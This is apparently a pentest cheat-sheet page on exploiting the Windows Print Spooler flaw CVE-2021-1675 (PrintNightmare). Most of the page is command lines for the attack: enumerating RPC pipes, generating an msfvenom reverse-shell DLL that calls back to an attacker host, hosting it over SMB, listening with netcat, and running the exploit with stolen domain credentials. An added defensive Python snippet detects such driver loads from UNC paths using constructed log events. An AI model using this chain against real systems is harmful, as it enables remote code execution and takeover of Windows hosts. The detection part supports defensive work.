PRIMARY CATEGORY → PRINT SPOOLER SERVICE

Theory


Abuse - UNIX-like

Checking if the Target’s RPC Namedpipes are available

Impacket’s RPCDump.py

Looking for MS-RPRN or MS-PAR pipes enabled

rpcdump.py '<DOMAIN>/<USER>:<PASSWD>@<TARGET>' | grep -iP --color -- 'MS-(RPRN|PAR)'

Creating a DLL Payload (Reverse Shell)

MSFVenom

msfvenom --payload windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<ATTACKER_PORT> --format dll --platform windows --arch x64 --out remote.dll

Setting up an SMB Server

Impacket’s SMBServer.py

smbserver.py -smb2support <SHARE> <LOCAL_PATH>

Setting up a Netcat Listener for the Reverse Shell

Netcat

nc -nlvp <PORT>

Running the Exploit

CVE-2021-1675.py

From the Attacker ⚔️

python3 CVE-2021-1675.py '<DOMAIN>/<USER>:<PASSWD>@<TARGET>' '\\<ATTACKER>\<SHARE>\remote.dll'
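On the defender's side, the chain above leaves a clear trace: the spooler installs a "driver" whose DLL lives on a remote share rather than in the local driver store. The following is an added example, not part of the original page, that runs that check over constructed Print Service log records. It assumes (not stated on the page) that Microsoft-Windows-PrintService/Operational events 316 and 808 carry the driver file paths in their message text; the host 10.0.0.5, the share name and the driver names in the sample events are constructed.

```python
import re
from dataclasses import dataclass

# Assumption (not from the page): Microsoft-Windows-PrintService/Operational
# event 316 ("Printer driver ... was added or updated. Files:- ...") and
# event 808 ("The print spooler failed to load a plug-in module ...") carry
# the driver file paths in their message text.
WATCHED_EVENT_IDS = {316, 808}

# Legitimate driver binaries live under the spooler driver store or the
# Windows driver store; anything else, and any UNC path, deserves a look.
TRUSTED_ROOT = re.compile(
    r"^[A-Za-z]:\\Windows\\System32\\(spool\\drivers|DriverStore)\\", re.IGNORECASE)
DLL_PATH = re.compile(r"(\\\\[^,\s]+\.dll|[A-Za-z]:\\[^,\s]+\.dll)", re.IGNORECASE)


@dataclass
class PrintEvent:
    event_id: int
    message: str


def suspicious_driver_paths(events):
    """Return (event_id, path, reason) for every driver/plug-in DLL that a
    watched event reports from a UNC share or from outside the driver stores."""
    findings = []
    for ev in events:
        if ev.event_id not in WATCHED_EVENT_IDS:
            continue
        for path in DLL_PATH.findall(ev.message):
            if path.startswith("\\\\"):
                findings.append((ev.event_id, path, "UNC path"))
            elif not TRUSTED_ROOT.match(path):
                findings.append((ev.event_id, path, "outside driver store"))
    return findings


# Constructed sample events (hypothetical host, share and driver names; not real telemetry).
SAMPLE_EVENTS = [
    PrintEvent(316, r"Printer driver Vendor PCL for Windows x64 Version-3 was added or updated. "
                    r"Files:- C:\Windows\System32\spool\drivers\x64\3\vendor_driver.dll. No user action is required."),
    PrintEvent(316, r"Printer driver 1234 for Windows x64 Version-3 was added or updated. "
                    r"Files:- C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_example\Amd64\UNIDRV.DLL, "
                    r"\\10.0.0.5\share\remote.dll, C:\Windows\System32\kernelbase.dll. No user action is required."),
    PrintEvent(808, r"The print spooler failed to load a plug-in module \\10.0.0.5\share\remote.dll."),
    PrintEvent(842, "Print job 12 was sent through the print processor winprint."),
]

if __name__ == "__main__":
    for event_id, path, reason in suspicious_driver_paths(SAMPLE_EVENTS):
        print(f"event {event_id}: {path} ({reason})")
```

The second 316 record reproduces the shape of the install performed above (a UNC data file plus a system DLL as config file), and both of its odd paths are reported, while the vendor driver from the spool driver store is not.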

Abuse - Windows